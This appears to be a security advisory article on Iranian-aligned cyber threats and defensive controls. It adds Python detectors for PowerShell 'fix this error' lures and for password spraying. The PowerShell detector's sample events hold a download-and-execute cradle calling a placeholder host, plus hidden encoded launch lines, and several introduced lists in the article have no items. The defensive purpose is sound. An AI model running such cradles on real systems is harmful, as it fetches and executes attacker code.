March 2026
Recent geopolitical tensions involving Iran have triggered a noticeable shift in the cyber security threat landscape. Intelligence from multiple security communities and national cyber authorities indicates that cyber activity linked to Iranian state-aligned actors and proxy groups is increasing.
While the majority of activity currently appears focused on geopolitical targets in the Middle East and allied nations, the global nature of cyber operations means organisations worldwide, including those in Australia, should remain vigilant. Periods of geopolitical instability have historically been accompanied by spikes in cyber espionage, disruptive attacks, and hacktivist campaigns.
This article explores recent activity, the risks posed to organisations, and practical steps to strengthen cyber resilience.
Iran maintains one of the most active and diverse cyber ecosystems globally, combining state-sponsored intelligence operations with loosely affiliated hacktivist groups. These actors conduct a mix of espionage, disruption, and influence operations aligned with geopolitical objectives.
Recent intelligence highlights activity across several well-known threat groups, including:
Alongside these state-aligned actors, Iranian cyber strategy frequently leverages hacktivist proxy groups to conduct disruptive or deniable operations. Groups such as Cyber Av3ngers, Handala, DieNet, and the Fatimion Cyber Team have conducted activities ranging from website defacements and DDoS attacks to intrusions into industrial control systems and surveillance infrastructure.
These groups often coordinate activity during periods of geopolitical tension to amplify disruption and influence operations.
Recent threat intelligence also highlights how Iranian-aligned groups are evolving their operational techniques.
One recent espionage campaign targeted government officials using advanced social engineering combined with custom malware. The operation deployed previously unseen .NET-based malware families designed for stealthy persistence and command-and-control communications.
Several notable tactics stood out:
Evidence suggests generative AI was used during malware development, enabling attackers to rapidly produce customised payloads and iterate tools more quickly than traditional development cycles.
Attackers tricked victims into manually executing malicious PowerShell commands by instructing them to “fix browser errors” or join fake collaboration sessions. This approach bypasses many automated security controls because the victim performs the action themselves.
Custom malware included techniques such as hidden Windows forms and delayed communications designed to evade sandbox analysis and automated detection.
These developments demonstrate how threat actors are blending advanced malware with human-centric exploitation techniques to increase success rates.
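The "run this PowerShell command to fix the error" lure described above leaves a recognisable footprint: a PowerShell host started from an interactive parent (the Explorer Run dialog or a terminal) with a command line built for stealth and download, rather than a script path. The following detection logic is an added example written for this article, not code from the original or from any vendor product. The process-creation record format and the indicator weights are this example's own assumptions; the sample events are constructed.

```python
import re
from dataclasses import dataclass


# Hypothetical process-creation record. Field names are this example's own,
# not those of any particular EDR or Sysmon schema.
@dataclass
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


# Parents from which a person typically launches a command by hand: Explorer
# (Run dialog / address bar) or a terminal. Non-interactive parents such as
# scheduled-task hosts are out of scope for this rule and need their own.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe"}

# (pattern, weight, description). Weights are an assumption for this example.
INDICATORS = [
    (re.compile(r"(?i)(^|\s)-(e|ec|en|enc|encodedcommand)\s"), 3, "encoded command"),
    (re.compile(r"(?i)-w(indowstyle)?\s+hidden"), 2, "hidden window"),
    (re.compile(r"(?i)\b(iex|invoke-expression)\b"), 3, "invoke-expression"),
    (re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b)"), 3, "download cradle"),
    (re.compile(r"(?i)-(ep|executionpolicy)\s+bypass"), 1, "execution policy bypass"),
    (re.compile(r"(?i)-(nop|noprofile)\b"), 1, "no profile"),
]

# Constructed sample events: two lure-style launches, one routine admin
# launch, one non-interactive launch and one unrelated process.
SAMPLE_EVENTS = [
    ProcessEvent("WS01", "jdoe", "explorer.exe", "powershell.exe",
                 "powershell.exe -w hidden -nop -ep bypass -enc <BASE64-PLACEHOLDER>"),
    ProcessEvent("WS02", "asmith", "explorer.exe", "powershell.exe",
                 'powershell.exe -c "iex (New-Object Net.WebClient).DownloadString(\'http://example.invalid/fix\')"'),
    ProcessEvent("WS03", "admin", "explorer.exe", "powershell.exe",
                 r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"),
    ProcessEvent("SRV01", "SYSTEM", "svchost.exe", "powershell.exe",
                 "powershell.exe -enc <BASE64-PLACEHOLDER>"),
    ProcessEvent("WS04", "bwong", "explorer.exe", "notepad.exe", "notepad.exe notes.txt"),
]


def score_event(ev):
    """Return (score, reasons) for one event; (0, []) unless it is PowerShell
    launched from an interactive parent."""
    if ev.image.lower() not in POWERSHELL_HOSTS:
        return 0, []
    if ev.parent_image.lower() not in INTERACTIVE_PARENTS:
        return 0, []
    score, reasons = 0, []
    for rx, weight, why in INDICATORS:
        if rx.search(ev.command_line):
            score += weight
            reasons.append(why)
    return score, reasons


def find_clickfix_candidates(events, threshold=5):
    """Return [(event, score, reasons)] for events scoring at or above threshold,
    in input order. A plain '-File script.ps1' launch stays below threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


if __name__ == "__main__":
    for ev, score, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"{ev.host} {ev.user}: score {score} ({', '.join(reasons)})")
        print(f"    {ev.command_line}")
```

The rule deliberately scores rather than matching a single string: a hidden window or an encoded command alone appears in legitimate admin tooling, but several of these together, started by a user from Explorer, is the shape of the lure. The non-interactive `svchost.exe` launch is ignored here on purpose; it belongs to a separate scheduled-task rule.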
Iranian cyber operations have evolved beyond traditional espionage and defacement campaigns. Security researchers increasingly describe their approach as “influence-driven disruption”.
In these campaigns, attackers:
This tactic, commonly referred to as a “hack-and-leak” operation, combines technical compromise with psychological and reputational impact.
Additionally, Iranian actors are increasingly targeting:
These strategies allow attackers to reach larger numbers of victims through supply chain compromise or infrastructure disruption.
The Australian Cyber Security Centre (ACSC) has advised that while there is currently no specific evidence of increased targeting of Australia, the evolving geopolitical environment increases the likelihood of opportunistic cyber activity.
Organisations with the following exposure should be particularly alert:
Even when attacks are not directly targeted, organisations may still be impacted through:
Global cyber operations rarely remain contained to a single region.
Given the tactics commonly used by Iranian-aligned actors, organisations should consider strengthening several core defensive controls.
Many campaigns rely on credential theft or password spraying.
Recommended measures include:
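Password spraying has a distinctive signature that single-account lockout thresholds miss: one source tries one or two guesses against many different accounts, so no individual account trips the lockout. The following detection logic is an added example written for this article, not code from the original or from any product. The authentication log format is a hypothetical one chosen for the example and the log lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Hypothetical authentication log format (constructed for this example):
#   <ISO timestamp> <FAIL|OK> user=<account> src=<source IP>
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<result>FAIL|OK) user=(?P<user>\S+) src=(?P<src>\S+)$"
)

# Constructed sample: one source spraying across many accounts and then
# succeeding, one source hammering a single account (brute force, not spray),
# and ordinary activity from a third source.
SAMPLE_LOG = """\
2026-03-02T09:00:01 FAIL user=alice src=203.0.113.7
2026-03-02T09:00:04 FAIL user=bob src=203.0.113.7
2026-03-02T09:00:07 FAIL user=carol src=203.0.113.7
2026-03-02T09:00:10 FAIL user=dave src=203.0.113.7
2026-03-02T09:00:13 FAIL user=erin src=203.0.113.7
2026-03-02T09:00:16 OK user=frank src=203.0.113.7
2026-03-02T09:01:00 FAIL user=alice src=198.51.100.4
2026-03-02T09:01:02 FAIL user=alice src=198.51.100.4
2026-03-02T09:01:04 FAIL user=alice src=198.51.100.4
2026-03-02T09:01:06 FAIL user=alice src=198.51.100.4
2026-03-02T09:01:08 FAIL user=alice src=198.51.100.4
2026-03-02T09:05:00 OK user=grace src=192.0.2.9
2026-03-02T09:30:00 FAIL user=heidi src=192.0.2.9
"""


def parse_auth_log(text):
    """Yield (timestamp, result, user, src) tuples, skipping malformed lines."""
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            yield (datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["src"])


def detect_password_spray(text, window=timedelta(minutes=10), min_accounts=5):
    """Flag sources whose failed logins cover >= min_accounts distinct users
    inside a sliding time window.

    Returns {src: {"accounts": [...], "success_after": [...]}} where
    success_after lists accounts that logged in successfully from the same
    source after the spray threshold was crossed: the case to triage first.
    """
    events = sorted(parse_auth_log(text), key=lambda e: e[0])
    recent = defaultdict(deque)  # src -> deque of (ts, user) failures inside window
    alerts = {}
    for ts, result, user, src in events:
        if result == "FAIL":
            q = recent[src]
            q.append((ts, user))
            while q and ts - q[0][0] > window:
                q.popleft()
            distinct = {u for _, u in q}
            if len(distinct) >= min_accounts:
                entry = alerts.setdefault(src, {"accounts": set(), "success_after": set()})
                entry["accounts"] |= distinct
        elif src in alerts:
            alerts[src]["success_after"].add(user)
    return {
        src: {"accounts": sorted(v["accounts"]), "success_after": sorted(v["success_after"])}
        for src, v in alerts.items()
    }


if __name__ == "__main__":
    for src, info in detect_password_spray(SAMPLE_LOG).items():
        print(f"{src}: sprayed {len(info['accounts'])} accounts {info['accounts']}, "
              f"later successes: {info['success_after']}")
```

Note that the single-account brute force from `198.51.100.4` is not reported: it never exceeds one distinct user, so a per-account lockout already covers it. The spray source is reported together with the account that subsequently logged in, which is the signal that a credential has actually been guessed and needs resetting.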
Iranian groups frequently exploit known vulnerabilities in edge devices.
Organisations should:
Modern campaigns increasingly target collaboration platforms such as:
Security awareness training should extend beyond email phishing to include multi-channel social engineering.
Industrial systems and smart devices can provide attackers with both operational access and intelligence gathering capabilities.
Best practices include:
Hacktivist groups often launch nuisance or disruptive campaigns during geopolitical crises.
Organisations should:
Cyber operations have become a central component of modern geopolitical competition. Nation-state actors increasingly blend espionage, disruption, and influence campaigns to achieve strategic objectives without direct military engagement.
For organisations, this means cyber risk can escalate rapidly in response to international events.
While not every organisation will be directly targeted, any organisation connected to global digital infrastructure can become part of the attack surface.
The most resilient organisations focus on three principles:
In an environment where cyber threats increasingly mirror geopolitical tensions, preparedness and resilience are essential.